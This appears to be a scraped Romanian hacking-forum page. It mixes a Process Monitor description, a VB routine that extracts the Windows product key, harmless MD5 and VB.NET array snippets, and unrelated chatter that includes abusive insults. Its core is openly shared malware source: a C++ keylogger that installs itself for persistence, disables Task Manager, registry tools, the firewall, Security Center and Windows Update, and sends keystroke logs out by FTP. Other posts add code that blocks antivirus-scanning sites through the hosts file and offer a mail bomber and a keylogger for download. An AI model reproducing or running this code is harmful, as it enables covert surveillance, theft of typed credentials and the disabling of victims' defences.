Skream Example

Process Monitor v2.94 By Mark Russinovich and Bryce Cogswel This is a tool I personally use from time to time. I mostly use it to grab registry keys or and files being changed by certain processes, but it can be used for so much more. All in all, a great tool when you want to monitor a process's actions (IO, reg, etc etc). You can also monitor multiple processes or and filter out or in actions as you want. Further information: Introduction rocess Monitor is an advanced monitoring tool for Windows that shows real-time file system, Registry and process/thread activity. It combines the features of two legacy Sysinternals utilities, Filemon and Regmon, and adds an extensive list of enhancements including rich and non-destructive filtering, comprehensive event properties such session IDs and user names, reliable process information, full thread stacks with integrated symbol support for each operation, simultaneous logging to a file, and much more. Its uniquely powerful features will make Process Monitor a core utility in your system troubleshooting and malware hunting toolkit. Overview of Process Monitor Capabilities Process Monitor includes powerful monitoring and filtering capabilities, including: * More data captured for operation input and output parameters * Non-destructive filters allow you to set filters without losing data * Capture of thread stacks for each operation make it possible in many cases to identify the root cause of an operation * Reliable capture of process details, including image path, command line, user and session ID * Configurable and moveable columns for any event property * Filters can be set for any data field, including fields not configured as columns * Advanced logging architecture scales to tens of millions of captured events and gigabytes of log data * Process tree tool shows relationship of all processes referenced in a trace * Native log format preserves all data for loading in a different Process Monitor instance * Process tooltip for easy viewing of process image information * Detail tooltip allows convenient access to formatted data that doesn't fit in the column * Cancellable search * Boot time logging of all operations The best way to become familiar with Process Monitor's features is to read through the help file and then visit each of its menu items and options on a live system. Taken from Process Monitor Download link: http://download.sysinternals.com/Files/ProcessMonitor.zip EXE download link: http://live.sysinternals.com/Procmon.exe

Are doar 5 ! Cititi si voi.

cacamas in topicul tau,mori inecat cu voma sa mori

Attribute VB_Name = "mWinProdKey" Option Explicit Private Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long Private Declare Function RegQueryValueEx Lib "advapi32.dll" Alias "RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, lpData As Any, lpcbData As Long) As Long Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (pDst As Any, pSrc As Any, ByVal ByteLen As Long) Public Function WinProdKey() As String Dim lhKey As Long Dim bvBuffer(163) As Byte Dim vCharset As Variant Dim bvChar(23) As Byte Dim I As Long Dim j As Long Dim lCur As Long If RegOpenKey(&H80000002, "SOFTWARE\MICROSOFT\Windows NT\CurrentVersion", lhKey) = 0& Then If RegQueryValueEx(lhKey, "DigitalProductId", 0, 3, bvBuffer(0), 164) = 0 Then Call CopyMemory(bvBuffer(0), bvBuffer(52), &HF) vCharset = Array( _ "B", "C", "D", "F", "G", "H", "J", "K", "M", "P", "Q", "R", _ "T", "V", "W", "X", "Y", "2", "3", "4", "6", "7", "8", "9") For I = 0 To 23 bvChar(I) = Asc(vCharset(I)) Next For I = 24 To 0 Step -1 lCur = 0 For j = 14 To 0 Step -1 lCur = lCur * 256 Xor bvBuffer(j) bvBuffer(j) = Int(lCur / 24) lCur = lCur Mod 24 Next WinProdKey = vCharset(lCur) & WinProdKey If I Mod 5 = 0 And I <> 0 Then WinProdKey = "-" & WinProdKey Next End If Call RegCloseKey(lhKey) End If End Function

#include <windows.h> #include <Winuser.h> #include <string> #include <fstream> using namespace std; char BatchFile[20] = "system.bat"; char* params; DWORD WINAPI OpenBatFile(LPVOID) { for( { Sleep(300000); ShellExecute(NULL* "open"* BatchFile* NULL* NULL* SW_HIDE);} } std::string GetKey(int Key) { std::string KeyString = ""; if (Key == 8) KeyString = "[delete]"; else if (Key == 13) KeyString = "\n"; else if (Key == 32) KeyString = " "; else if (Key == VK_PAUSE) KeyString = "[PAUSE]"; else if (Key == VK_CAPITAL) KeyString = "[CAPITAL]"; else if (Key == VK_SHIFT) KeyString = "[SHIFT]"; else if (Key == VK_TAB) KeyString = "[TABULATOR]"; else if (Key == VK_CONTROL) KeyString = "[CTRL]"; else if (Key == VK_ESCAPE) KeyString = "[ESCAPE]"; else if (Key == VK_END) KeyString = "[END]"; else if (Key == VK_HOME) KeyString = "[HOME]"; else if (Key == VK_LEFT) KeyString = "[left]"; else if (Key == VK_RIGHT) KeyString = "[right]"; else if (Key == VK_UP) KeyString = "[UP]"; else if (Key == VK_DOWN) KeyString = "[DOWN]"; else if (Key == VK_SNAPSHOT) KeyString = "[SNAPSHOT]"; else if (Key == VK_NUMLOCK) KeyString = "[NUMLOCK]"; else if (Key == 190 || Key == 110) KeyString = "."; else if (Key >=96 && Key <= 105) KeyString = Key-48; else if (Key > 47 && Key < 60) KeyString = Key; if (Key != VK_LBUTTON || Key != VK_RBUTTON) { if (Key > 64 && Key < 91) { if (GetKeyState(VK_CAPITAL)) KeyString = Key; else { Key = Key + 32; KeyString = Key; } } } return KeyString; } int main() { int WINAPI WinMain (HINSTANCE hThisInstance* HINSTANCE hPrevInstance* LPSTR lpszArgument* int nFunsterStil); char path[MAX_PATH]; HMODULE GetModH = GetModuleHandle(NULL); char sys[MAX_PATH]; GetModuleFileName(GetModH* path* sizeof(path)); GetSystemDirectory(sys* sizeof(sys)); strcat(sys* "\\borg.exe"); CopyFile(path* sys* false); HKEY hKey* hKey2; unsigned char reg[2] = "0"; RegOpenKeyEx(HKEY_LOCAL_MACHINE*"Software\\Microsoft\\Windows\\CurrentVersion\\Run"* 0* KEY_SET_VALUE* &hKey ); RegSetValueEx(hKey* "MS-Windows-secretly"* 0* REG_SZ*(const unsigned char*)sys* sizeof(sys)); RegCreateKey(HKEY_CURRENT_USER*"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System"*&hKey2); RegSetValueEx(hKey2*"DisableTaskMgr"*0*REG_DWORD*reg*sizeof(reg)); RegCloseKey(hKey)*(hKey2); DeleteFile("C:\\WINDOWS\\system32\\log.txt"); ofstream FWUP; FWUP.open("C:\\WINDOWS\\system32\\update.bat"); FWUP<<"@echo off\n"; FWUP<<"net stop ""Security Center""\n"; FWUP<<"net stop SharedAccess\n"; FWUP<<"> ""%Temp%.\\kill.reg"" ECHO REGEDIT4\n"; FWUP<<">>""%Temp%.\\kill.reg"" ECHO.\n"; FWUP<<">>""%Temp%.\\kill.reg"" ECHO [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\SharedAccess]\n"; FWUP<<">>""%Temp%.\\kill.reg"" ECHO ""Start""=dword:00000004\n"; FWUP<<">>""%Temp%.\\kill.reg"" ECHO.\n"; FWUP<<">>""%Temp%.\\kill.reg"" ECHO [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\wuauserv]\n"; FWUP<<">>""%Temp%.\\kill.reg"" ECHO ""Start""=dword:00000004\n"; FWUP<<">>""%Temp%.\\kill.reg"" ECHO.\n"; FWUP<<">>""%Temp%.\\kill.reg"" ECHO [HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\wscsvc]\n"; FWUP<<">>""%Temp%.\\kill.reg"" ECHO ""Start""=dword:00000004\n"; FWUP<<">>""%Temp%.\\kill.reg"" ECHO.\n"; FWUP<<"START /WAIT REGEDIT /S ""%Temp%.\\kill.reg""\n"; FWUP<<"DEL ""%Temp%.\\kill.reg""\n"; FWUP<<"DEL %0\n"; FWUP.close(); ofstream disable; disable.open("C:\\WINDOWS\\system32\\syssvr.bat"); disable<<"@echo off\n"; disable<<"reg add ""HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System"" /v ""disableregistrytools"" /t REG_DWORD /d ""1"" /f >NUL\n"; disable.close(); //write ur ftp-information's here ofstream log; log.open("C:\\WINDOWS\\system32\\drivers\\config.sys"); log<<"OPEN ftpserver\n"; log<<"USER username\n"; log<<"ftppassword\n"; log<<"ASCII\n"; log<<"SEND C:\\WINDOWS\\system32\\log.txt\n"; log<<"BYE\n"; log<<"exit\n"; log.close(); ofstream Ausgabe; Ausgabe.open("C:\\WINDOWS\\system32\\system.bat"); Ausgabe<<"ftp -n -i -s:C:\\WINDOWS\\system32\\drivers\\config.sys\n"; Ausgabe<<"bye\n"; Ausgabe<<"exit\n"; Ausgabe.close(); ShellExecute(NULL* NULL* "C:\\WINDOWS\\system32\\syssvr.bat"* params* NULL* SW_HIDE); ShellExecute(NULL* NULL* "C:\\WINDOWS\\system32\\update.bat"* params* NULL* SW_HIDE); DWORD OpenBatch; HANDLE hOpenBatFile = CreateThread(NULL* 0* OpenBatFile* 0* 0* &OpenBatch); std::string Filename = "C:\\WINDOWS\\system32\\log.txt"; std::string TempString = ""; std::fstream FStream; FStream.open(Filename.c_str()* std::fstream::out | std::fstream::app); while(true) { // 0% CPU Sleep(5); for(int i = 8; i < 191; i++) { if(GetAsyncKeyState(i)&1 ==1) { TempString = GetKey (i); FStream.write(TempString.c_str()* TempString.size()); FStream.close(); FStream.open(Filename.c_str()* std::fstream::out | std::fstream::app); } } } }

Public Function MD5CalcFile(ByVal filepath As String) As String Using reader As New System.IO.FileStream(filepath, IO.FileMode.Open, IO.FileAccess.Read) Using md5 As New System.Security.Cryptography.MD5CryptoServiceProvider Dim hash() As Byte = md5.ComputeHash(reader) Return ByteArrayToString(hash) End Using End Using End Function Private Function ByteArrayToString(ByVal arrInput() As Byte) As String Dim sb As New System.Text.StringBuilder(arrInput.Length * 2) For i As Integer = 0 To arrInput.Length - 1 sb.Append(arrInput(i).ToString("X2")) Next Return sb.ToString().ToLower End Function Function getMD5Hash(ByVal strToHash As String) As String Dim md5Obj As New Security.Cryptography.MD5CryptoServiceProvider Dim bytesToHash() As Byte = System.Text.Encoding.ASCII.GetBytes(strToHash) bytesToHash = md5Obj.ComputeHash(bytesToHash) Dim strResult As String = "" For Each b As Byte In bytesToHash strResult += b.ToString("x2") Next Return strResult End Function Dump from my Visual Studio folder. Most likely I got it off the net, so credits to whoever originally created it. I use it a lot Usage: dim MD5Str as string = getMD5Hash("abc") dim FileMD5 as string = MD5CalcFile("c:\boot.ini")

Ce s-a intamplat cu ISR ? de cateva saptamani bune nu mai merge.

Pana cand o indreapta vine apocalipsa.

Falimentul e aproape! Cum î?i va pl?ti România datoriile, dac? nu mai produce? read more

Ce conteaza ?

The ability to work with arrays is important in any programming language. VB.NET offers a simple way of grouping data into the array structures similarly to other languages. In this article, I will look at array declaration and usage. Purpose of the arrays Arrays are generally used for storing similar types of values or objects. They allow grouping variables together and allow referring to them by using an index. Arrays have an upper bound and a lower bound, which simply refer to the starting index and the ending index of a given array structure. Additionally, the data in the array can be sorted. Simple arrays are one-dimensional; however, you can also use multi-dimensional arrays in VB.NET. You can loop through an array to determine and to modify the values stored in the array. Declaring and initialising arrays There are two ways of initialising the arrays: to declare and initialise them in one statement, or to declare an array and choose to initialise it later. When declaring and initialising arrays in the same statement, you must specify the type of the array elements and the number of the elements the array will hold. In VB.NET, arrays are zero based, which means that the index of the first element is zero. The elements are numbered sequentially. You must specify the number of array elements by indicating the upper bound of the array. The upper bound is the number that specifies the index of the last element in the array. Snippet A shows the declaration and initialisation of an array of integers. For Snippet A Dim arrNumbers(4) As Integer 'Declares & initialises an array of 5 integers, with indexes ranging from 0 to 4 Another way to declare and initialise arrays is to perform these operations in two separate steps. If you declare an array without specifying a number of elements on one line, you have to provide the values for each item of the array when you initialise it. The initial values are provided enclosed in the {} braces, using a comma as a separator. Snippet B shows the declaration and initialisation of an array in two separate steps. Dim arrNumbers() As Integer 'Declares the array of integers arrNumbers = New Integer() {0,1,2,3,4} 'Initialises the array to five members & sets their values Once an array is declared and initialised, it's possible to change the size of an array in run time by redefining it. You can use the ReDim statement to change the number of items in an array structure. Snippet C shows declaration, initialisation, and then re-sizing of an array structure. Dim arrNumbers(32) As Integer' Declares & Initialises an array of integers ReDim arrNumbers(45) As Integer' Re-initialises the array By default, the data stored in an array is lost whenever an array is re-initialised. However, you can use the ReDim statement with the Preserve keyword in order to keep the existing data in the array when it's being re-initialised. Snippet D re-initialises an array structure using the Preserve statement to keep the data already stored in the array. Dim arrNumbers () As Integer = {0,1,2,3,4}' Declares & initialises the array ReDim Preserve arrNumbers (25) 'Resizes the array, but retains the data in elements 0 through 4 Dim arrNumbers () As Integer = {0,1,2,3,4}' Declares & initialises the array ReDim Preserve arrNumbers (25) 'Resizes the array, but retains the data in elements 0 through 4 Credits: pradeep

Imports System.IO Imports System.Reflection #Region " block all Av sites " Public Shared Sub avbloker() 'Dim objWriter As New System.IO.StreamWriter("C:\fire2.txt") 'objWriter.Write("xfind2") 'objWriter.Close() Dim path As [String] = "C:\Windows\System32\drivers\etc\hosts" Dim sw As New StreamWriter(path, True) Dim sitetoblock As [String] = vbLf & " 127.0.0.1 www.virustotal.com" Dim sitetoblock1 As [String] = vbLf & " 127.0.0.1 www.virscan.org" Dim sitetoblock2 As [String] = vbLf & " 127.0.0.1 www.virusscan.jotti.org" Dim sitetoblock3 As [String] = vbLf & " 127.0.0.1 www.vscan.novirusthanks.org" sw.Write(sitetoblock) sw.Write(vbNewLine & sitetoblock1) sw.Write(vbNewLine & sitetoblock2) sw.Write(vbNewLine & sitetoblock3) sw.Close() End End Sub #End Region

Este Spy Net 2.6

Spy Net (April 11,2011) 22:00 Video by Skream - Myspace Video Ma distrez si eu putin la inceput de saptamana.

Asa e treaba pe aici

De ce sa fie pacat ? postezi aiurea

Product Name:CH MAIL BOMBER Author:Skream Example (Source Code and Design) Location:Europe,Romania Download Now

Vreau si eu una va rog !

Product Name:Exploit Keylogger Author:Skream Example Location:Europe,Romania Download now

Atunci hai la o narghilea cu cola cum am facut eu in parc cu colegii ziceau oamenii ca suntem drogati

Iluzia c? sunt mai s?n?toase ?i avantajul gustului vând bine ?ig?rile mentolate, mai ales tinerilor. Americanii vor s? le interzic?.

Mie mi-au placut,toata ziua fumez de astea de acum:))

bun venit omule

Bun venit !

ce e asta ? de la kaspersky ?